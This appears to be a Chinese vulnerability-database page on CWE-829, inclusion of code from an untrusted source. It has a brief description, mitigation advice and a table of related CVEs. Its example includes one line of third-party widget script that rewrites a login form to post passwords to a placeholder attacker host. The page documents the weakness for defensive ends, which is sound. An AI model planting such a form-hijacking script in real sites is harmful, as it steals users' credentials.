CWE-829 从非可信控制范围包含功能例程 类弱点 167 条 CVE 漏洞汇总,含 AI 中文分析。
CWE-829 属于不信任源引入漏洞,指软件从非预期控制域导入可执行功能或库。攻击者常通过篡改第三方依赖或供应链,注入恶意代码以执行任意操作,从而破坏系统完整性。开发者应严格验证所有外部组件的来源与完整性,仅集成受信任且经过安全审计的库,并实施最小权限原则,确保仅加载符合预期的功能模块,以阻断不可信代码的执行路径。
<div class="header"> Welcome! <div id="loginBox">Please Login: <form id ="loginForm" name="loginForm" action="login.php" method="post"> Username: <input type="text" name="username" /> <br/> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form> </div> <div id="WeatherWidget"> <script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script> </div> </div>
...Weather widget code.... document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";
| CVE ID | 标题 | CVSS | 风险等级 | Published |
|---|---|---|---|---|
| CVE-2022-22246 | Juniper Networks Junos OS 安全漏洞 — Junos OS | 7.5 | High | 2022-10-18 |
| CVE-2022-33317 | Mitsubishi Electric MC Works64和ICONICS GENESIS64 安全漏洞 — GENESIS64 | 7.8 | High | 2022-07-20 |
| CVE-2022-31156 | Gradle 数据伪造问题漏洞 — gradle | 6.6 | Medium | 2022-07-14 |
| CVE-2021-41037 | Eclipse Equinox 安全漏洞 — Eclipse Equinox p2 | 10.0 | Critical | 2022-07-08 |
| CVE-2022-24824 | Discourse 安全漏洞 — discourse | 5.3 | Medium | 2022-04-14 |
| CVE-2022-1161 | Rockwell Automation Logix Controllers 安全漏洞 — 1768 CompactLogix controllers | 10.0 | Critical | 2022-04-11 |
| CVE-2022-23630 | Gradle 安全漏洞 — gradle | 7.5 | High | 2022-02-10 |
| CVE-2021-41256 | Nextcloud Android app 安全漏洞 — news-android | 5.8 | Medium | 2021-11-30 |
| CVE-2021-32802 | Nextcloud 安全漏洞 — security-advisories | 9.3 | Critical | 2021-09-07 |
| CVE-2021-3603 | PHPMailer 安全漏洞 — PHPMailer | 8.1 | High | 2021-06-17 |
| CVE-2021-29427 | Gradle 安全漏洞 — gradle | 8.0 | High | 2021-04-13 |
| CVE-2020-8128 | jsreport 代码问题漏洞 — jsreport | 9.8 | - | 2020-02-14 |
| CVE-2019-11770 | Eclipse Buildship 加密问题漏洞 — Eclipse Buildship | 8.1 | - | 2019-06-14 |
| CVE-2019-10249 | Xtend和Xtext 安全特征问题漏洞 — Eclipse Xtext | 8.1 | - | 2019-05-06 |
| CVE-2019-10248 | Eclipse Vorto 安全漏洞 — Eclipse Vorto | 8.1 | - | 2019-04-22 |
| CVE-2019-10240 | Eclipse hawkBit 加密问题漏洞 — Eclipse hawkBit | 8.1 | - | 2019-04-03 |
| CVE-2018-1122 | procps-ng 权限许可和访问控制问题漏洞 — procps-ng, procps | 7.0 | - | 2018-05-23 |
CWE-829(从非可信控制范围包含功能例程) 是常见的弱点类别,本平台收录该类弱点关联的 167 条 CVE 漏洞。